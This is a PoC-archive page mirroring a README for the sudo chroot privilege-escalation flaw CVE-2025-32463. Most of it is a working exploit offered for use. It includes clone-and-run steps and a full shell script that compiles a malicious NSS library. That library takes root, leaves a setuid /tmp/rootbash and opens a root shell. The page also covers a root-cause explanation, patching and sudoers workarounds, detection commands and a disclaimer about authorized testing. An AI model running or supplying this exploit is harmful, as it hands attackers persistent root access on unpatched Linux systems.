Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1325 CNY

100%
Buy Us a Coffee

CVE-2025-32463 PoC — Sudo 安全漏洞

Source
https://github.com/KaiHT-Ladiant/CVE-2025-32463
Associated Vulnerability
Title:Sudo 安全漏洞 (CVE-2025-32463)
Description:Sudo before 1.9.17p1 allows local users to obtain root access because /etc/nsswitch.conf from a user-controlled directory is used with the --chroot option.
Description
CVE-2025-32463 - Sudo Chroot Privilege Escalation Exploit
Readme
# CVE-2025-32463 - Sudo Chroot Privilege Escalation Exploit

## Overview

CVE-2025-32463 is a critical local privilege escalation vulnerability in sudo versions 1.9.14 through 1.9.17. This vulnerability allows attackers with sudo privileges to escalate to root access by exploiting a design flaw in the chroot option processing logic.

## Vulnerability Details

- **CVE ID**: CVE-2025-32463
- **Affected Versions**: sudo 1.9.14 - 1.9.17
- **Vulnerability Type**: Local Privilege Escalation (LPE)
- **Severity**: Critical
- **Patched Version**: sudo 1.9.17p1 and later

## Technical Description

The vulnerability occurs due to a **timing issue in sudo's security validation process**. The `pivot_root` function is executed **before security policy verification**, allowing attackers to manipulate the file system environment that sudo uses for authentication and authorization.

### Attack Flow

1. **Environment Manipulation**: Attacker creates a controlled chroot environment with malicious `nsswitch.conf`
2. **Library Injection**: Malicious NSS (Name Service Switch) library is placed in the controlled environment
3. **Privilege Escalation**: sudo loads and executes the malicious library with root privileges
4. **Root Access**: Attacker gains full root shell access

### Affected Functions

- `pivot_root`: Executed too early in the process
- `set_cmnd_path`: Operates in the manipulated environment
- `command_matches`: Security checks bypassed due to environment manipulation

## Prerequisites

Before using this exploit, ensure the following conditions are met:

- [ ] Target system runs sudo version 1.9.14 - 1.9.17
- [ ] Current user has sudo privileges
- [ ] sudoers configuration allows chroot operations
- [ ] gcc compiler is available on the target system
- [ ] Write access to temporary directories (e.g., /tmp)

## Usage

### Quick Start

1. Clone this repository:
```
git clone https://github.com/KaiHT-Ladiant/CVE-2025-32463
cd CVE-2025-32463
```

2. Make the script executable:
```
chmod +x cve-2025-32463.sh
```

3. Run the exploit:
```
./cve-2025-32463.sh
```

### Manual Verification

Check if the target system is vulnerable:

```
# Check sudo version
sudo --version

# Check sudo privileges
sudo -l

# Look for chroot-related permissions
sudo -l | grep chroot
```

## Exploit Code

The main exploit script (`cve-2025-32463.sh`):

```
#!/bin/bash
# CVE-2025-32463 PoC - Sudo Chroot Privilege Escalation
# Based on research by Rich Mirch @ Stratascale Cyber Research Unit

STAGE=$(mktemp -d /tmp/pentest.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > pentester.c<<'CEOF'
#include <stdlib.h>
#include <unistd.h>

void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  system("id > /tmp/pwned_proof.txt");
  system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
  execl("/bin/bash", "/bin/bash", NULL);
}
CEOF

mkdir -p pentest/etc libnss_
echo "passwd: /pentester" > pentest/etc/nsswitch.conf
cp /etc/group pentest/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/pentester.so.2 pentester.c

echo "[*] Exploiting CVE-2025-32463..."
echo "[*] Attempting privilege escalation..."
sudo -R pentest pentest

# Cleanup
rm -rf ${STAGE?}
```

## Verification

After successful exploitation, verify root access:

```
# Check current privileges
whoami

# Check proof file
cat /tmp/pwned_proof.txt

# Use setuid bash for persistent root access
/tmp/rootbash -p
```

## Mitigation

### Immediate Actions

1. **Update sudo** to version 1.9.17p1 or later:
   ```
   # Ubuntu/Debian
   sudo apt update && sudo apt upgrade sudo
   
   # CentOS/RHEL
   sudo yum update sudo
   
   # or
   sudo dnf update sudo
   ```

2. **Remove chroot directives** from sudoers (temporary workaround):
   ```
   # Backup current configuration
   sudo cp /etc/sudoers /etc/sudoers.backup
   
   # Remove chroot-related entries
   sudo sed -i '/chroot/d' /etc/sudoers
   
   # Verify syntax
   sudo visudo -c
   ```

### Detection

Monitor for exploitation attempts:

```
# Check for suspicious temporary directories
find /tmp -name "*.stage.*" -type d

# Monitor sudo logs
tail -f /var/log/auth.log | grep sudo

# Look for NSS library compilation
find /tmp -name "libnss_*.so*" -type f
```

## Technical Details

### Root Cause Analysis

The vulnerability stems from a **design flaw in sudo's execution flow**:

1. **Normal Expected Flow**:
   - Parse user input
   - Validate sudoers policy
   - Set up environment (including chroot)
   - Execute command

2. **Actual Vulnerable Flow**:
   - Parse user input
   - **Execute chroot (pivot_root) - Problem occurs here**
   - Validate sudoers policy (in manipulated environment)
   - Execute command

### NSS Library Exploitation

The exploit leverages the Name Service Switch (NSS) system:

1. Sudo reads `/etc/nsswitch.conf` for user authentication
2. In the chroot environment, attacker controls this file
3. Malicious NSS library is loaded with root privileges
4. Library constructor executes arbitrary code as root

## Testing Environment

This exploit has been tested on:

- Ubuntu 20.04/22.04 with sudo 1.9.15
- Debian 11/12 with sudo 1.9.14-1.9.17
- CentOS 8/9 with affected sudo versions
- Docker containers with vulnerable sudo installations

## References

- [Official sudo security advisory](https://www.sudo.ws/security/advisories/)
- [Original research by Rich Mirch](https://github.com/kh4sh3i/CVE-2025-32463)
- [Sudo source code analysis](https://github.com/sudo-project/sudo)

## Disclaimer

⚠️ **IMPORTANT DISCLAIMER** ⚠️

This tool is provided for **educational and authorized testing purposes only**. 

- Use only on systems you own or have explicit permission to test
- Unauthorized use of this exploit is illegal and unethical
- The authors are not responsible for any misuse or damage
- Always ensure you have proper authorization before conducting security testing

## Contributing

Contributions are welcome! Please:

1. Fork the repository
2. Create a feature branch
3. Submit a pull request with detailed description

## License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

## Changelog

### v1.0.0
- Initial release
- Basic exploit functionality
- Comprehensive documentation

---

**Note**: This vulnerability affects a critical system component. Please use responsibly and ensure all testing is authorized.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →